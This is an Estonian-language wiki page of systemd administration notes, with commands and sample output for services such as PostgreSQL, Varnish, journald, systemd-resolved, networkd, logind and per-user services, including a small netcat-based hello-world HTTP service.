Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
-rw-r--r-- 1 root root 623 Jul 19 02:56 /usr/lib/tmpfiles.d/x11.conf
-rw-r--r-- 1 root root 41 Aug 16 12:13 /usr/lib/tmpfiles.d/zabbix-agent.conf
</pre>

===Timer===

TODO

# systemctl list-timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2017-07-25 06:52:49 EEST 6h left Mon 2017-07-24 06:49:40 EEST 17h ago apt-daily.timer apt-daily.service
Tue 2017-07-25 10:41:54 EEST 10h left Mon 2017-07-24 10:41:54 EEST 13h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

===systemd-fstab-generator===

Paistab, et systemd tekitab automaatselt /etc/fstab sisule vastavad unit failid /run alla, nt

<pre>
# cat /run/systemd/generator/var-lib-postgresql.mount
# Automatically generated by systemd-fstab-generator

[Unit]
SourcePath=/etc/fstab
Documentation=man:fstab(5) man:systemd-fstab-generator(8)
Before=local-fs.target
Requires=systemd-fsck@dev-system-var_lib_postgresql.service
After=systemd-fsck@dev-system-var_lib_postgresql.service

[Mount]
What=/dev/system/var_lib_postgresql
Where=/var/lib/postgresql
Type=ext4
</pre>

Kui fstab sees kirjeldatud LVM voluumi nime jääb samaks, aga UUID muutub (nt olemasolev LVM volüüm kustutada ja tekitada asemele teine) ning öelda

# mount /var/lib/postgresql

siis failisüsteem monteeritakse ja ühendatakse ka kohe lahti syslog tekstiga

<pre>
Feb 20 00:57:33 ky-test kernel: [1210006.815639] EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: discard
Feb 20 00:57:33 ky-test systemd[1]: var-lib-postgresql.mount: Unit is bound to inactive unit dev-system-var_lib_postgresql.device. Stopping, too.
Feb 20 00:57:33 ky-test systemd[1]: Unmounting /var/lib/postgresql...
Feb 20 00:57:33 ky-test systemd[1]: Unmounted /var/lib/postgresql.
</pre>

Lahenduseks on öelda

# systemctl daemon-reload

===Märkused===

* kerneli mooduleid loeb käivitamisel systemd-modules-load

systemd-modules-load.service

Seadistusfailiks on

# ls -ld /etc/modules-load.d/modules.conf
lrwxrwxrwx 1 root root 10 Oct 9 14:58 /etc/modules-load.d/modules.conf -> ../modules

systemd komponente kasutavas operatsioonisüsteemis töötavad nt sellised protsessid

# ps aux | grep '/lib/systemd/systemd-'
root 173 0.0 0.5 28188 2912 ? Ss 15:39 0:00 /lib/systemd/systemd-journald
root 190 0.0 0.7 44072 4000 ? Ss 15:39 0:00 /lib/systemd/systemd-udevd
systemd+ 388 0.0 0.4 97952 2312 ? Ssl 15:39 0:00 /lib/systemd/systemd-timesyncd
root 396 0.0 0.5 28352 2772 ? Ss 15:39 0:00 /lib/systemd/systemd-logind
systemd+ 402 0.0 0.5 28504 2892 ? Ss 15:39 0:00 /lib/systemd/systemd-networkd
systemd+ 1004 0.0 0.5 31340 2880 ? Ss 16:00 0:00 /lib/systemd/systemd-resolved

Tundub, et midagi teeb käsk systemd konfi muudatuste kehtestamiseks

# systemctl daemon-reload

Tugevamaks kehtestamiseks või nö jamade lahendamiseks sobib öelda

# systemctl daemon-reexec

===su ja sudo kasutamine===

su/sudo/runuser programmide kasutamisel ei moodustada nö kasutaja keskkonda (environment)

nende asemel annab nö autentsema tulemuse machinectl kasutamine, nt

# machinectl shell imre@

nt on seejärel käivitatud sellised protsessid

<pre>
imre@ph-minio-01:~$ ps U imre
PID TTY STAT TIME COMMAND
1212 pts/1 Ss 0:00 /bin/bash
1216 ? Ss 0:00 /usr/lib/systemd/systemd --user
1218 ? S 0:00 (sd-pam)
1251 pts/1 S 0:00 (sd-pam)
...
</pre>

ja väärtustatud mitmesugused XDG keskkonnamuutujad

<pre>
$ env | grep XDG
XDG_SESSION_TYPE=tty
XDG_SESSION_CLASS=user
XDG_SESSION_ID=29
XDG_RUNTIME_DIR=/run/user/1000
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/deskto
</pre>

===LoadCredentials kasutamine===

<pre>
root@dh-minio-01:~# systemctl edit nginx

[Service]
LoadCredential=ssl_key:/etc/ssl/private/nginx.key
LoadCredential=ssl_cert:/etc/ssl/certs/nginx.crt
PrivateTmp=yes
</pre>

===systemd-analyze===

<pre>
kasutaja@ph-minio-01:~$ systemd-analyze --user security nginx-07
NAME DESCRIPTION EXPOSURE
✗ KeyringMode= Service shares key material with other service 0.2
PrivateTmp= Service runs in special boot phase, option is not appropriate
ProtectHome= Service runs in special boot phase, option is not appropriate
ProtectSystem= Service runs in special boot phase, option is not appropriate
RootDirectory=/RootImage= Service runs in special boot phase, option is not appropriate
SupplementaryGroups= Service runs as root, option does not matter
RemoveIPC= Service runs as root, option does not apply
✗ User=/DynamicUser= Service runs as root user 0.4
✗ CapabilityBoundingSet=~CAP_SYS_TIME Service processes may change the system clock 0.2
✗ NoNewPrivileges= Service processes may acquire new privileges 0.2
✓ AmbientCapabilities= Service process does not receive ambient capabilities
✗ PrivateDevices= Service potentially has access to hardware devices 0.2
✗ ProtectClock= Service may write to the hardware clock or system clock 0.2
